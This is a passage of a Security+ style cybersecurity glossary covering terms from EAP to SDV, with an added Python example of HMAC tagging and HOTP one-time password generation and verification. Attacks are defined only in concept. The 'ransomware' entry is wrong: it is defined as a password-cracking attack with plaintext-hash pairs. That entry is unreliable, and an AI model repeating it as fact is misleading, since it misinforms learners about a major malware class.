EAP (Extensible Authentication Protocol) Framework for negotiating authentication methods that enables systems to use hardware-based identifiers, such as fingerprint scanners or smart card readers, for authentication.

EAP-FAST (EAP Flexible Authentication via Secure Tunneling) An EAP method that is expected to address the shortcomings of LEAP.

EAPoL (Extensible Authentication Protocol over LAN) A port-based network access control (PNAC) mechanism that allows the use of EAP authentication when a host connects to an Ethernet switch.

EAP-TLS (EAP Transport Layer Security) An EAP method that requires server-side and client-side certificates for authentication using SSL/TLS.

EAP-TTLS (EAP Tunneled Transport Layer Security) An EAP method that enables a client and server to establish a secure connection without mandating a client-side certificate.

east-west traffic Design paradigm accounting for the fact that data center traffic between servers is greater than that passing in and out (north-south).

ECC (elliptic curve cryptography) An asymmetric encryption algorithm that leverages the algebraic structures of elliptic curves over finite fields to derive public/private key pairs.

edge computing Provisioning processing resource close to the network edge of IoT devices to reduce latency.

e-discovery Procedures and tools to collect, preserve, and analyze digital evidence.

EDR (endpoint detection and response) A software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats.

EF (exposure factor) In risk calculation, the percentage of an asset's value that would be lost during a security incident or disaster scenario.

elasticity The property by which a computing environment can instantly react to both increasing and decreasing demands in workload.

entropy A measure of disorder. Cryptographic systems should exhibit high entropy to better resist brute force attacks.

EOL (end of life) Product life cycle phase where sales are discontinued and support options reduced over time.

EOSL (end of service life) Product life cycle phase where support is no longer available from the vendor.

EPP (endpoint protection platform) A software agent and monitoring system that performs multiple security tasks.

ERM (enterprise risk management) The comprehensive process of evaluating, measuring, and mitigating the many risks that pervade an organization.

error handling Coding methods to anticipate and deal with exceptions thrown during execution of a process.

escrow In key management, the storage of a backup key with a third party.

ESP (Encapsulating Security Protocol) IPSec sub-protocol that enables encryption and authentication of the header and payload of a data packet.

evil twin A wireless access point that deceives users into believing that it is a legitimate network access point.

execution control The process of determining what additional software may be installed on a client or server beyond its baseline to prevent the use of unauthorized software.

exploitation framework Suite of tools designed to automate delivery of exploits against common software and firmware vulnerabilities.

extranet A private network that provides some access to outside parties, particularly vendors, partners, and select customers.

failover A technique that ensures a redundant component, device, or application can quickly and efficiently take over the functionality of an asset that has failed.

fake telemetry Deception strategy that returns spoofed data in response to network probes.

false negative In security scanning, a case that is not reported when it should be.

false positive In security scanning, a case that is reported when it should not be.

FAR (false acceptance rate) Biometric assessment metric that measures the number of unauthorized users who are mistakenly allowed access.

Faraday cage A wire mesh container that blocks external electromagnetic fields from entering into the container.

FC (Fibre Channel) High-speed network communications protocol used to implement SANs.

FDE (full disk encryption) Encryption of all data on a disk (including system files, temporary files, and the pagefile) can be accomplished via a supported OS, third-party software, or at the controller level by the disk device itself.

federation A process that provides a shared login capability across multiple systems and enterprises. It essentially connects the identity management services of multiple systems.

FIM (file integrity monitoring) A type of software that reviews system files to ensure that they have not been tampered with.

fingerprint scanner Biometric authentication device that can produce a template signature of a user's fingerprint, then subsequently compare the template to the digit submitted for authentication.

first responder The first experienced person or team to arrive at the scene of an incident.

fog computing Provisioning processing resource between the network edge of IoT devices and the data center to reduce latency.

FPGA (field programmable gate array) A processor that can be programmed to perform a specific function by a customer rather than at the time of manufacture.

FRR (false rejection rate) Biometric assessment metric that measures the number of valid subjects who are denied access.

FTK (Forensic Toolkit) A commercial digital forensics investigation management and utilities suite, published by AccessData.

FTPS A type of FTP using TLS for confidentiality.

full backup A backup type in which all selected files, regardless of prior state, are backed up.

full tunnel VPN configuration where all traffic is routed via the VPN gateway.

fuzzing A dynamic code analysis technique that involves sending a running application random and unusual input so as to evaluate how the app responds.

gait analysis Biometric mechanism that identifies a subject based on movement pattern.

GCM (Galois/Counter Mode) A mode of block chained encryption that provides message authenticity for each block.

GDPR (General Data Protection Regulation) Provisions and requirements protecting the personal data of European Union (EU) citizens. Transfers of personal data outside the EU Single Market are restricted unless protected by like-for-like regulations, such as the US's Privacy Shield requirements.

geofencing The practice of creating a virtual boundary based on real-world geography.

geolocation The identification or estimation of the physical location of an object, such as a radar source, mobile phone, or Internet-connected computing device.

GPO (Group Policy Object) On a Windows domain, a way to deploy per-user and per-computer settings such as password policy, account restrictions, firewall status, and so on.

grep command Linux command for searching and filtering input. This can be used as a file search tool when combined with ls.

group account A group account is a collection of user accounts that are useful when establishing file permissions and user rights because when many individuals need the same level of access, a group could be established containing all the relevant users.

HA (high availability) The property that defines how closely systems approach the goal of providing data availability 100 percent of the time while maintaining a high level of system performance.

hardening The process of making a host or app configuration secure by reducing its attack surface, through running only necessary services, installing monitoring software to protect against malware and intrusions, and establishing a maintenance schedule to ensure the system is patched to be secure against software exploits.

hashcat Command-line tool used to perform brute force and dictionary attacks against password hashes.

hashing A function that converts an arbitrary length string input to a fixed length string output. A cryptographic hash function does this in a way that reduces the chance of collisions, where two different inputs produce the same output. Also known as message digest.

head command Linux utility for showing the first lines in a file.

heat map In a Wi-Fi site survey, a diagram showing signal strength at different locations.

heuristic analysis (heuristic) A method that uses feature comparisons and likenesses rather than specific signature matching to identify whether the target of observation is malicious.

HMAC (hash-based message authentication code) A method used to verify both the integrity and authenticity of a message by combining a cryptographic hash of the message with a secret key.

homomorphic encryption Method that allows computation of certain fields in a dataset without decrypting it.

honeypot (honeynet) A host, network, or file set up with the purpose of luring attackers away from assets of actual value and/or discovering attack strategies and weaknesses in the security configuration. Also known as honeyfile.

horizontal privilege escalation When a user accesses or modifies specific resources that they are not entitled to.

host-based firewall A software application running on a single host and designed to protect only that host. Also known as personal firewall.

hot site A fully configured alternate network that can be online quickly after a disaster.

hot/cold aisle Arrangement of server racks to maximize the efficiency of cooling systems. Also known as cold/hot aisle.

HOTP (HMAC-based One-time Password) An algorithm that generates a one-time password using a hash-based authentication code to verify the authenticity of the message.

HSM (hardware security module) An appliance for generating and storing cryptographic keys. This sort of solution may be less susceptible to tampering and insider threats than software-based storage.

HTML5 VPN Using features of HTML5 to implement remote desktop/VPN connections via browser software (clientless).

hybrid cloud A cloud deployment that uses both private and public elements.

IaaS (Infrastructure as a Service) A computing method that uses the cloud to provide any or all infrastructure needs.

IaC (infrastructure as code) A provisioning architecture in which deployment of resources is performed by scripted automation and orchestration.

IAM (identity and access management) A security process that provides identification, authentication, and authorization mechanisms for users, computers, and other entities to work with organizational assets like networks, operating systems, and applications.

ICS (industrial control system) A network managing embedded devices (computer systems that are designed to perform a specific, dedicated function).

identity fraud The invention of fake personal information or the theft and misuse of an individual's personal information.

IdP (identity provider) In a federated network, the service that holds the user account and performs authentication.

IDS (intrusion detection system) A software and/or hardware system that scans, audits, and monitors the security infrastructure for signs of attacks in progress.

IEEE 802.1X A standard for encapsulating EAP communications over a LAN (EAPoL) to implement port-based authentication.

IKE (Internet Key Exchange) Framework for creating a Security Association (SA) used with IPSec. An SA establishes that two hosts trust one another (authenticate) and agree secure protocols and cipher suites to use to exchange data.

implicit deny A basic principle of security stating that unless something has explicitly been granted access, it should be denied access.

incremental backup A backup type in which all selected files that have changed since the last full or incremental backup (whichever was most recent) are backed up.

industrial camouflage Methods of disguising the nature and purpose of buildings or parts of buildings.

inherent risk Risk that an event will pose if no controls are put in place to mitigate it.

input validation Any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application.

insecure object reference Coding vulnerability where unvalidated input is used to select a resource object, such as a file or database.

insider threat A type of threat actor who is assigned privileges on the system that cause an intentional or unintentional incident.

integer overflow An attack in which a computed result is too large to fit in its assigned storage space, which may lead to crashing or data corruption, and may trigger a buffer overflow.

integrity The fundamental security goal of keeping organizational information accurate, free of errors, and without unauthorized modifications.

intelligence fusion In threat hunting, using sources of threat intelligence data to automate detection of adversary IoCs and TTPs.

intranet A private network that is only accessible by the organization's own personnel.
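The HMAC entry on the previous page and the HOTP entry above, carried through as an added example (not code from the CompTIA guide): the keyed hash serves as a message tag that proves integrity and origin, and the same primitive becomes a one-time password through the RFC 4226 counter-and-truncate construction. The secret is the published RFC 4226 test key rather than a real one, and the size of the server's look-ahead window is an assumption made for the demonstration.

```python
import hashlib
import hmac
import struct
from typing import Optional

# Published RFC 4226 test key (ASCII "12345678901234567890"); not a real secret.
RFC4226_SECRET = b"12345678901234567890"


def hmac_tag(key: bytes, message: bytes) -> bytes:
    """HMAC-SHA-256 over message: a hash that only a holder of key can
    produce, so the tag proves both integrity and origin of the message."""
    return hmac.new(key, message, hashlib.sha256).digest()


def hmac_verify(key: bytes, message: bytes, tag: bytes) -> bool:
    """Recompute and compare in constant time, so response timing does not
    reveal how many leading bytes of a forged tag happened to be right."""
    return hmac.compare_digest(hmac_tag(key, message), tag)


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP (RFC 4226): HMAC-SHA-1 over the 8-byte big-endian counter,
    dynamic truncation to a 31-bit integer, reduced modulo 10**digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                      # low nibble of the last byte
    code = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
            | mac[offset + 2] << 8 | mac[offset + 3])
    return str(code % 10 ** digits).zfill(digits)


def hotp_verify(secret: bytes, submitted: str, server_counter: int,
                window: int = 5) -> Optional[int]:
    """Server-side check. The token's counter may have run ahead (codes
    generated but never submitted), so a small look-ahead window is
    searched; the window size is an assumption for this example. Counters
    below server_counter are never tried, which rejects replay of a code
    that has already been used. Returns the next counter to store on
    success, or None on failure."""
    for c in range(server_counter, server_counter + window + 1):
        if hmac.compare_digest(hotp(secret, c), submitted):
            return c + 1
    return None


if __name__ == "__main__":
    for c in range(3):
        print(c, hotp(RFC4226_SECRET, c))          # 755224, 287082, 359152
    print(hotp_verify(RFC4226_SECRET, "287082", 0))   # 2
    print(hotp_verify(RFC4226_SECRET, "755224", 2))   # None: replayed code
```

Two points the definitions do not spell out: the comparison is done with `hmac.compare_digest` rather than `==` so that a wrong guess takes the same time as a near-miss, and the server only ever moves its stored counter forward, which is what makes the password genuinely one-time.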

IoC (indicator of compromise) A sign that an asset or network has been attacked or is currently under attack.

IPAM (IP address management) Software consolidating management of multiple DHCP and DNS services to provide oversight into IP address allocation across an enterprise network.

IPFIX (IP Flow Information Export) Standards-based version of the NetFlow framework.

IPS (intrusion prevention system) An IDS that can actively block attacks.

IPSec (Internet Protocol Security) A set of open, non-proprietary standards that are used to secure data through authentication and encryption as the data travels across the network or the Internet.

IRP (incident response plan) Specific procedures that must be performed if a certain type of event is detected or reported.

ISA (interconnection security agreement) Any federal agency interconnecting its IT system to a third party must create an ISA to govern the relationship. An ISA sets out a security risk awareness process and commits the agency and supplier to implementing security controls.

ISAC (Information Sharing and Analysis Center) Not-for-profit group set up to share sector-specific threat intelligence and security best practices amongst its members.

ISO/IEC 27K (International Organization for Standardization 27000 Series) A comprehensive set of standards for information security, including best practices for security and risk management, compliance, and technical implementation.

ISO/IEC 31K (International Organization for Standardization 31000 Series) A comprehensive set of standards for enterprise risk management.

IV attack (Initialization Vector Attack) A wireless attack where the attacker is able to predict or control the IV of an encryption process, thus giving the attacker access to view the encrypted data that is supposed to be hidden from everyone else except the user or network.

jamming An attack in which radio waves disrupt 802.11 wireless signals.

job rotation The policy of preventing any one individual performing the same role or tasks for too long. This deters fraud and provides better oversight of the person's duties.

jump server A hardened server that provides access to other hosts. Also known as jumpbox.

Kerberos A single sign-on authentication and authorization service that is based on a time-sensitive ticket-granting system.

keylogger Malicious software or hardware that can record user keystrokes.

kill chain A model developed by Lockheed Martin that describes the stages by which a threat actor progresses a network intrusion.

L2TP (Layer 2 Tunneling Protocol) VPN protocol for tunneling PPP sessions across a variety of network protocols such as IP, Frame Relay, or ATM.

lateral movement The process by which an attacker is able to move from one part of a computing environment to another.

LDAP (Lightweight Directory Access Protocol) A network protocol used to access network directory databases, which store information about authorized users and their privileges, as well as other organizational information.

LDAP injection An application attack that targets web-based applications by fabricating LDAP statements that are typically created by user input.

LDAPS (Lightweight Directory Access Protocol Secure) A method of implementing LDAP using SSL/TLS encryption.

LEAP (Lightweight Extensible Authentication Protocol) Cisco Systems' proprietary EAP implementation.

least privilege A basic principle of security stating that something should be allocated the minimum necessary rights, privileges, or information to perform its role.

lightweight cryptography Cryptographic algorithms with reduced compute requirements that are suitable for use in resource-constrained environments, such as battery-powered devices.

LLR (lessons learned report) An analysis of events that can provide insight into how to improve response processes in the future. Also known as after action report or AAR.

load balancer A type of switch or router that distributes client requests between different resources, such as communications links or similarly-configured servers. This provides fault tolerance and improves throughput.

logger command Linux utility that writes data to the system log.

logic bomb A malicious program or script that is set to run under particular circumstances or in response to a defined event.

loop protection If broadcast traffic is allowed to continually loop around a network, the number of broadcast packets increases exponentially, crashing the network. Loop protection in switches (such as Spanning Tree Protocol), and in routers (Time To Live for instance) is designed to prevent this.

MaaS (monitoring as a service) Cloud service providing ongoing security and availability monitoring of on-premises and/or cloud-based hosts and services.

MAC (Mandatory Access Control) Access control model where resources are protected by inflexible, system-defined rules. Resources (objects) and users (subjects) are allocated a clearance level (or label).

MAC (Message Authentication Code) Proving the integrity and authenticity of a message by combining its hash with a shared secret.

MAC cloning (Media Access Control cloning) An attack in which an attacker falsifies the factory-assigned MAC address of a device's network interface. Also known as MAC spoofing.

MAC filtering (Media Access Control filtering) Applying an access control list to a switch or access point so that only clients with approved MAC addresses can connect to it.

MAC flooding A variation of an ARP poisoning attack where a switch's cache table is inundated with frames from random source MAC addresses.

MAM (mobile application management) Enterprise management function that enables control over apps and storage for mobile devices and other endpoints.

managerial control A category of security control that gives oversight of the information system.

mandatory vacations The principle that states when and how long an employee must take time off from work so that their activities may be subjected to a security review.

maneuver In threat hunting, the concept that threat actor and defender may use deception or counterattacking strategies to gain positional advantage.

mantrap (access control vestibule) A secure entry system with two gateways, only one of which is open at any one time.

MD5 (Message Digest Algorithm v5) A cryptographic hash function producing a 128-bit output.

MDM (mobile device management) The process and supporting technologies for tracking, controlling, and securing the organization's mobile infrastructure.

measured boot A UEFI feature that gathers secure metrics to validate the boot process in an attestation report.

MEF (mission essential function) A business or organizational activity that is too critical to be deferred for anything more than a few hours, if at all.

memdump command Linux utility developed as part of the Coroner's Toolkit to dump system memory data to a file.

memory leak A software vulnerability that can occur when software does not release allocated memory when it is done using it, potentially leading to system instability.

metadata Information stored or recorded as a property of an object, state of a system, or transaction.

MFA (multifactor authentication) An authentication scheme that requires the user to present at least two different factors as credentials, from something you know, something you have, something you are, something you do, and somewhere you are. Specifying two factors is known as 2FA.

microservices A software architecture where components of the solution are conceived as highly decoupled services not dependent on a single platform type or technology.

mirroring A type of RAID that uses two hard disks, providing the simplest way of protecting a single disk against failure. Data is written to both disks and can be read from either disk.

MitB attack (Man-in-the-Browser attack) An attack when the web browser is compromised by installing malicious plug-ins or scripts, or intercepting API calls between the browser process and DLLs.

MitM attack (Man-in-the-Middle attack) A form of eavesdropping where the attacker makes an independent connection between two victims and steals information to use fraudulently.

MMS (multimedia messaging service) Extension to SMS allowing digital data (picture, video, or audio) to be sent over a cellular data connection.

mode of operation Implementation of a block symmetric cipher, with some modes allowing secure encryption of a stream of data, with or without authentication for each block.

MoU (memorandum of understanding) Usually a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money.

MPLS (Multiprotocol Label Switching) Developed by Cisco from ATM as a means of providing traffic engineering (congestion control), Class of Service, and Quality of Service within a packet-switched, rather than circuit-switched, network.

MSA (measurement systems analysis) Evaluates the data collection and statistical methods used by a quality management process to ensure they are robust.

MSSP (managed security service provider) Third-party provision of security configuration and monitoring as an outsourced service.

MTBF (mean time between failures) The rating on a device or component that predicts the expected time between failures.

MTD (maximum tolerable downtime) The longest period of time a business can be inoperable without causing irrevocable business failure.

MTTF (mean time to failure) The average time a device or component is expected to be in operation.

MTTR (mean time to repair/replace/recover) The average time taken for a device or component to be repaired, replaced, or otherwise recover from a failure.

multi-cloud A cloud deployment model where the cloud consumer uses multiple public cloud services.

multipath Overprovisioning controllers and cabling so that a host has failover connections to storage media.

NAC (network access control) A general term for the collected protocols, policies, and hardware that authenticate and authorize access to a network at the device level.

narrow-band Low-power cellular networks designed to provide data connectivity to IoT devices.

NAT (network address translation) A routing mechanism that conceals internal addressing schemes from the public Internet by translating between a single public address on the external side of a router and private, non-routable addresses internally.

ncat Utility for reading and writing raw data over a network connection. Also known as netcat.

NDA (non-disclosure agreement) An agreement that stipulates that entities will not share confidential information, knowledge, or materials with unauthorized third parties.

Nessus One of the best-known commercial vulnerability scanners, produced by Tenable Network Security. Also known as Tenable.

NetFlow A Cisco-developed means of reporting network flow information to a structured database. NetFlow allows better understanding of IP traffic flows as used by different network applications and hosts.

NFC (Near Field Communication) A standard for peer-to-peer (2-way) radio communications over very short distances, facilitating contactless payment and similar technologies. NFC is based on RFID.

NFV (network functions virtualization) Provisioning virtual network appliances, such as switches, routers, and firewalls, via VMs and containers.

next-generation firewall Advances in firewall technology, from app awareness, user-based filtering, and intrusion prevention to cloud inspection. Also known as layer 7 firewall.

Nmap Versatile port scanner used for topology, host, service, and OS discovery and enumeration.

nonce An arbitrary number used only once in a cryptographic communication, often to prevent replay attacks.

non-repudiation The security goal of ensuring that the party that sent a transmission or created data remains associated with that data and cannot deny sending or creating that data.

normalization A routine that applies a common consistent format to incoming data so that it can be processed safely. Normalization is referred to in the context of log collection and software coding.

NTLM authentication (NT LAN Manager authentication) A challenge-response authentication protocol created by Microsoft for use in its products.

nxlog Software optimized for multi-platform log collection and aggregation.

OATH (Initiative for Open Authentication) An industry body comprising the main PKI providers, such as Verisign and Entrust, that was established with the aim of developing an open, strong authentication framework.

OAuth (Open Authorization) Standard for federated identity management, allowing resource servers or consumer sites to work with user accounts created and managed on a separate identity provider.

obfuscation A technique that essentially hides or camouflages code or other information so that it is harder to read by unauthorized users.

OCSP (online certificate status protocol) Allows clients to request the status of a digital certificate, to check whether it is revoked.

offboarding The process of ensuring that all HR and other requirements are covered when an employee leaves an organization. Also known as exit interview.

offline CA (offline certificate authority) In PKI, a CA (typically the root CA) that has been disconnected from the network to protect it from compromise.

OIDC (OpenID Connect) An authentication layer that sits on top of the OAuth 2.0 authorization protocol.

OID (object identifier) Numeric schema used for attributes of digital certificates.

onboarding The process of bringing in a new employee, contractor, or supplier.

OOB (out-of-band management) Accessing the administrative interface of a network appliance using a separate network from the usual data network. This could use a separate VLAN or a different kind of link, such as a dial-up modem.

Opal Standards for implementing device encryption on storage devices.

operational control A category of security control that is implemented by people.

orchestration The automation of multiple steps in a deployment process.

order of volatility The order in which volatile data should be recovered from various storage locations and devices after a security incident occurs.

G-16 | Glossary

OSINT (open-source intelligence) Publicly available information plus the tools used to aggregate and search it.

OT (operational technology) A communications network designed to implement an industrial control system rather than data networking.

OTA (over the air) A firmware update delivered on a cellular data connection.

output encoding Coding methods to sanitize output created from user input.

OWASP (Open Web Application Security Project) A charity and community publishing a number of secure application development resources.

P12 (Public Key Cryptography Standard #12) Format that allows a private key to be exported along with its digital certificate.

P7B File format for transmitting a chain of digital certificates, using PKCS#7.

PaaS (Platform as a Service) A computing method that uses the cloud to provide any platform-type services.

PAM (pluggable authentication module) Framework for implementing authentication providers in Linux.

passive scan An enumeration or vulnerability scan that analyzes only intercepted network traffic rather than sending probes to a target. More generally, passive reconnaissance techniques are those that do not require direct interaction with the target.

PAT (port address translation) Maps private host IP addresses onto a single public IP address. Each host is tracked by assigning it a random high TCP port for communications. Also known as network address port translation (NAPT) or NAT overloading.

patch management Identifying, testing, and deploying OS and application updates. Patches are often classified as critical, security-critical, recommended, and optional.

PCI DSS (Payment Card Industry Data Security Standard) Information security standard for organizations that process credit or bank card payments.

PDU (power distribution unit) Advanced strip socket that provides filtered output voltage. A managed unit supports remote administration.

PEAP (Protected Extensible Authentication Protocol) EAP implementation that uses a server-side certificate to create a secure tunnel for user authentication, referred to as the inner method.

PEM (privacy-enhanced mail) Base64 encoding scheme used to store certificate and key data as ASCII text.

penetration testing A test that uses active tools and security utilities to evaluate security by simulating an attack on a system. A pen test will verify that a threat exists, then will actively test and bypass security controls, and will finally exploit vulnerabilities on the system. Also known as pentest.

percent encoding Mechanism for encoding characters as hexadecimal values delimited by the percent sign.

persistence (load balancing) In load balancing, the configuration option that enables a client to maintain a connection with a load-balanced server over the duration of the session. Also referred to as sticky sessions.

persistence In cybersecurity, the ability of a threat actor to maintain covert access to a target host or network.

PFS (perfect forward secrecy) A characteristic of transport encryption that ensures if a key is compromised the compromise will only affect a single session and not facilitate recovery of plaintext data from other sessions.

PFX (personal information exchange) Windows file format for storing a private key and certificate data. The file can be password-protected.

pharming An impersonation attack in which a request for a website, typically an e-commerce site, is redirected to a similar-looking, but fake, website.

PHI (protected/personal health information) Information that identifies someone as the subject of medical and insurance records, plus associated hospital and laboratory test results.

Glossary | G-17

phishing A type of email-based social engineering attack, in which the attacker sends email from a supposedly reputable source, such as a bank, to try to elicit private information from the victim.

physical control A type of security control that acts against in-person intrusion attempts.

PII (personally identifiable information) Data that can be used to identify or contact an individual (or in the case of identity theft, to impersonate them).

pinning A deprecated method of trusting digital certificates that bypasses the CA hierarchy and chain of trust to minimize man-in-the-middle attacks.

PIV card (personal identity verification card) A smart card that meets the standards for FIPS 201, in that it is resistant to tampering and provides quick electronic authentication of the card's owner.

PKCS (public key cryptography standards) Series of standards defining the use of certificate authorities and digital certificates.

PKI (public key infrastructure) Framework of certificate authorities, digital certificates, software, services, and other cryptographic components deployed for the purpose of validating subject identities.

playbook A checklist of actions to perform to detect and respond to a specific type of incident.

PLC (programmable logic controller) A type of computer designed for deployment in an industrial or outdoor setting that can automate and monitor mechanical systems.

PNAC (port-based network access control) A switch (or router) that performs some sort of authentication of the attached device before activating the port.

pointer dereferencing A software vulnerability that can occur when code attempts to read a memory location specified by a pointer, but the memory location is null. Also known as dereferencing.

Point-to-Point/Point-to-Multipoint Topology A point-to-point topology is one where two nodes have a dedicated connection to one another. In a point-to-multipoint topology, a central node mediates links between remote nodes. Also known as Point-to-point.

port forwarding A process in which a router takes requests from the Internet for a particular application (such as HTTP) and sends them to a designated host on the LAN. Also known as destination network address translation or DNAT.

port mirroring Copying ingress and/or egress communications from one or more switch ports to another port. This is used to monitor communications passing over the switch. Also known as switched port analyzer or SPAN.

port security Preventing a device attached to a switch port from communicating on the network unless it matches a given MAC address or other protection profile.

post-quantum Anticipating challenges to current cryptographic implementations and general security issues in a world where threat actors have access to significant quantum processing capability.

PowerShell A command shell and scripting language built on the .NET Framework.

PPP (Point-to-Point Protocol) Dial-up protocol working at layer 2 (Data Link) used to connect devices remotely to networks.

PPTP (Point-to-Point Tunneling Protocol) Developed by Cisco and Microsoft to support VPNs over PPP and TCP/IP. PPTP is highly vulnerable to password cracking attacks and considered obsolete.

private cloud A cloud that is deployed for use by a single entity.

private key In asymmetric encryption, the private key is known only to the holder and is linked to, but not derivable from, a public key distributed to those with which the holder wants to communicate securely. A private key can be used to encrypt data that can be decrypted by the linked public key or vice versa.

G-18 | Glossary

privilege access management The use of authentication and authorization mechanisms to provide an administrator with centralized or decentralized control of user and group role-based privilege management.

privilege escalation The practice of exploiting flaws in an operating system or other application to gain a greater level of access than was intended for the user or application.

provenance In digital forensics, being able to trace the source of evidence to a crime scene and show that it has not been tampered with.

proxy server A server that mediates the communications between a client and another server. It can filter and often modify communications, as well as provide caching services to improve performance. Also known as forward proxy.

pseudo-anonymization Removing personal information from a data set to make identification of individuals difficult, even if the data set is combined with other sources.

PSK (pre-shared key) Passphrase-based mechanism to allow group authentication to a wireless network. The passphrase is used to derive an encryption key.

PtH attack (pass the hash attack) A network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on.

public cloud A cloud that is deployed for shared use by multiple independent tenants.

public key During asymmetric encryption, this key is freely distributed and can be used to perform the reverse encryption or decryption operation of the linked private key in the pair.

PUP (potentially unwanted program) Software that cannot definitively be classed as malicious, but may not have been chosen by or wanted by the user.

purple team A mode of penetration testing where red and blue teams share information and collaborate throughout the engagement.

purpose limitation In data protection, the principle that personal information can be collected and processed only for a stated purpose to which the subject has consented.

Python High-level programming language that is widely used for automation.

QA (quality assurance) Policies, procedures, and tools designed to ensure defect-free development and delivery.

QoS (quality of service) Systems that differentiate data passing over the network that can reserve bandwidth for particular applications. A system that cannot guarantee a level of available bandwidth is often described as Class of Service (CoS). Also known as CoS.

qualitative analysis A risk analysis method that uses opinions and reasoning to measure the likelihood and impact of risk.

quantitative analysis A risk analysis method that is based on assigning concrete values to factors.

quantum cryptography Using quantum computing for cryptographic tasks, such as distributing keys or cracking (traditional) cryptographic systems. Quantum computing works on the principle that its units (qubits) have more properties than the bits used in "classical" computers, notably and very crudely that a qubit can have a probability of being 1 or 0 and that inspecting the value of one qubit can instantly determine that of others (entanglement).

RA (recovery agent) In PKI, an account or combination of accounts that can copy a cryptographic key from backup or escrow and restore it to a subject host or user.

RA (registration authority) In PKI, an authority that accepts requests for digital certificates and authenticates the entities making those requests.

Glossary | G-19

race condition A software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer.

RADIUS (Remote Authentication Dial-in User Service) A standard protocol used to manage remote and wireless authentication infrastructures.

RAID (redundant array of independent/inexpensive disks) Specifications that support redundancy and fault tolerance for different configurations of multiple device storage systems.

rainbow table Tool for speeding up attacks against Windows passwords by precomputing possible hashes.

ransomware A type of password attack where an attacker uses a set of related plaintext passwords and their hashes to crack passwords.

Raspberry Pi Open-source platform producing programmable circuit boards for education and industrial prototyping.

RAT (remote access Trojan) Malware that creates a backdoor remote administration channel to allow a threat actor to access and control the infected host.

RBAC (role-based access control) An access control model where resources are protected by ACLs that are managed by administrators and that provide user permissions based on job functions.

RCS (rich communication services) Platform-independent advanced messaging functionality designed to replace SMS and MMS.

red team The "hostile" or attacking team in a penetration test or incident response exercise.

regex (regular expression) A group of characters that describe how to execute a specific search pattern on a given text.

replay attack An attack where the attacker intercepts some authentication data and reuses it to try to re-establish a session.

replication Automatically copying data between two processing systems either simultaneously on both systems (synchronous) or from a primary to a secondary location (asynchronous).

residual risk Risk that remains even after controls are put into place.

retention policy Dictates for how long information needs to be kept available on backup and archive systems. This may be subject to legislative requirements.

reverse proxy A type of proxy server that protects servers from direct contact with client requests.

reverse shell A maliciously spawned remote command shell where the victim host opens the connection to the attacking host.

risk acceptance The response of determining that a risk is within the organization's appetite and no countermeasures other than ongoing monitoring is needed.

risk avoidance In risk mitigation, the practice of ceasing activity that presents risk.

risk deterrence In risk mitigation, the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Also known as risk reduction.

risk matrix/heat map A graphical table indicating the likelihood and impact of risk factors identified for a workflow, project, or department for reference by stakeholders.

risk mitigation The response of reducing risk to fit within an organization's risk appetite.

risk register A document highlighting the results of risk assessments in an easily comprehensible format (such as a "traffic light" grid). Its purpose is for department managers and technicians to understand risks associated with the workflows that they manage.

risk transference In risk mitigation, the response of moving or sharing the responsibility of risk to another entity, such as by purchasing cybersecurity insurance.

G-20 | Glossary

risk-based framework In ESA, a framework that uses risk assessment to prioritize security control selection and investment.

robot sentry A remote-controlled or autonomous robot capable of patrolling site premises or monitoring gateways.

root CA (root certificate authority) In PKI, a CA that issues certificates to intermediate CAs in a hierarchical structure.

rootkit A class of malware that modifies system files, often at the kernel level, to conceal its presence.

router firewall A hardware device that has the primary function of a router, but also has firewall functionality embedded into the router firmware.

routing protocols Rules that govern how routers communicate and forward traffic between networks.

RPO (recovery point objective) The longest period of time that an organization can tolerate lost data being unrecoverable.

RSA (Rivest Shamir Adelman) Named for its designers, Ronald Rivest, Adi Shamir, and Len Adelman, the first successful algorithm for public key encryption with a variable key length and block size.

RTBH (remote triggered black hole) Using a trigger device to send a BGP route update that instructs routers to drop traffic that is suspected of attempting DDoS.

RTO (recovery time objective) The length of time it takes after an event to resume normal business operations and activities.

RTOS (real-time operating system) A type of OS that prioritizes deterministic execution of operations to ensure consistent response for time-critical tasks.

RTP (Real-time Transport Protocol) Opens a data stream for video and voice applications over UDP. The data is packetized and tagged with control information (sequence numbering and time-stamping).

rule-based access control A non-discretionary access control technique that is based on a set of operational rules or restrictions to enforce a least privileges permissions policy.

runbook An automated version of a playbook that leaves clearly defined interaction points for human analysis.

S/MIME (Secure/Multipurpose Internet Mail Extensions) An email encryption standard that adds digital signatures and public key cryptography to traditional MIME communications.

SaaS (Software as a Service) A computing method that uses the cloud to provide application services to users.

SAE (Simultaneous Authentication of Equals) Personal authentication mechanism for Wi-Fi networks introduced with WPA3 to address vulnerabilities in the WPA-PSK method.

salt A security countermeasure that mitigates the impact of a rainbow table attack by adding a random value to ("salting") each plaintext input.

SAML (Security Assertion Markup Language) An XML-based data format used to exchange authentication information between a client and a service.

SAN (subject alternative name) Field in a digital certificate allowing a host to be identified by multiple host names/subdomains.

sandbox A computing environment that is isolated from a host system to guarantee that the environment runs in a controlled, secure fashion. Communication links between the sandbox and the host are usually completely prohibited.

sanitization The process of thoroughly and completely removing data from a storage medium so that file remnants cannot be recovered.

SAS (Serial Attached Small Computer Systems Interface) Developed from parallel SCSI, SAS represents the highest performing hard disk interface available.

SCADA (Supervisory Control and Data Acquisition) A type of industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas.

Glossary | G-21

scalability The property by which a computing environment is able to gracefully fulfill its ever-increasing resource needs.

scanless Utility that runs port scans through third-party websites to evade detection.

SCAP (Security Content Automation Protocol) A NIST framework that outlines various accepted practices for automating vulnerability scanning.

screened host A dual-homed proxy gateway server used to provide Internet access to other network nodes, while protecting them from external attack.

script kiddie An inexperienced, unskilled attacker that typically uses tools or scripts created by others.

SDK (software development kit) Coding resources provided by a vendor to assist with development projects that use their platform or API.

SDN (software-defined networking) APIs and compatible hardware/virtual appliances allowing for programmable network appliances and systems.

SDV (software-defined visibility) APIs for reporting configuration and state data for automated monitoring and alerting.

